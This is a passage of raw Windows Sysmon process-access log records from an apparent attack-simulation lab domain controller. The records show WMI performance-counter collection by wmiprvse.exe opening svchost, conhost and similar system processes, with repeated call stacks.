bem\WmiPerfClass.dll+eaa6 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 